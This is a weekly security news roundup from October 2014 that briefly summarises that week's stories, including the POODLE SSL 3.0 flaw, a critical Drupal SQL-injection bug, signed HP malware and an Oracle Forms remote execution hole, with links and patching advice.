A take on the security news, week 42
- Monday
HP signs malware with valid certificate
HP is revoking an old certificate from 2010 because its been used to sign a trojan horse. Investigation found that the problem origins from a HP developer's machine being infected.
The impact of this certificate revokation is small but can cause some problem for users with older HP systems trying to reinstall their drivers from 2010.
http://krebsonsecurity.com/2014/10/signed-malware-is-expensive-oops-for-hp/
Snapchat snaps stolen by hackers
A third-party service that allows user to "save snaps" have been compromised and hundreds of thousands of pictures are stolen. The hackers say they will make the pictures available and searchable by Snapchat userid.
- Tuesday
Cyanogenmod vulnerable to man-in-the-middle SSL attacks
The Cyanogenmod developers used example code from Oracles Java 1.5 certificate handling code and implemented in the project. It seems that this example code is vulnerable in the part that checks for hostnames.
Cyanogenmod is not the first developers that copy & pasted this flawed code from Oracle into their project.
http://www.theregister.co.uk/2014/10/13/androids_cyanogenmod_open_to_mitm_attacks/
https://docs.google.com/document/pub?id=1roBIeSJsYq3Ntpf6N0PIeeAAvu4ddn7mGo6Qb7aL7ew
Decrypting Android Snapchat Images
A good writeup on how Snapchat is encrypting / decrypting images on your Android device. There is also proof-of-concept code.
https://github.com/programa-stic/snapchat-decrypt
- Wednesday
Yet another SSL vulnerability with a fancy name, POODLE
The vulnerability is related to the design of SSL 3.0 and its somehow similar to the BEAST attack when it comes to impact and the fact that it would not be patched. The solution is to stop using SSL 3.0 which is nearly 18 years old.
Most modern browsers support newer versions than SSL 3.0 so there is no need to support it anymore. The only consideration is IE6 on Windows XP, which does not support might cause problem if you stop supporting SSL 3.0.
Test your server: https://ssltest.com/
Test your client: https://www.poodletest.com/
http://googleonlinesecurity.blogspot.no/2014/10/this-poodle-bites-exploiting-ssl-30.html
https://technet.microsoft.com/en-us/library/security/3009008.aspx
https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/
- Thursday
OS X Leaves Indexes With Private Data on USB Drives
F-Secure have discovered that your spotlight index can be saved to USB drives without you knowing about it. This is nothing new, but the problem is that the index might contain indexing of information that is not on your USB drive, but present somewhere else on your system. So if your mail is indexed it might be copied to an USB drive you plug in to your machine.
They have reproduced the issue and reported it to Apple which is "aware of the issue and investigates further".
There is no quickfix for this issue, but you can turn of spotlight indexing, or choose which folders it should index (i.e you can exclude your mail folder).
http://www.f-secure.com/weblog/archives/00002752.html
Drupal patches higly critical SQL-injection vulnerability
The SQL-injection flaw which can be found in Drupal 7.x can allow for arbitrary remote code execution. Patch as soon as possible. Versions affected is Drupal core 7.x prior to Drupal core 7.32
http://threatpost.com/drupal-fixes-highly-critical-sql-injection-flaw/108861
https://www.drupal.org/SA-CORE-2014-005
- Friday
How to log SSL information from your webserver
Its time to start planning for the next big SSL vulnerability. While you are waiting you can start logging information about SSL use on your server so that you can react accordingly when needed.
The article shows how you can log relevant information in Apache and Nginx
https://isc.sans.edu/forums/diary/Logging+SSL/18847
Ebola phishing scams
US-CERT warn users about email scams and campagins that are using the Ebola virus as a theme. Its nothing new that scammers try to use global disasters as an way to trick people to click links (and thus get infected).
https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Remote execution vulnerability in Oracle Forms 10g
There is a critical vulnerability in Oracle Forms 10g which allows remote execution. An attacker can craft malicious parameters and add them to the URL to open a remote shell on the system.
Oracle Forms 10g is a discontinued product, and you should upgrade to version 11. If upgrade is not an option you should create a whitelist of allowed characters or removing support for JSP files on the remote web server.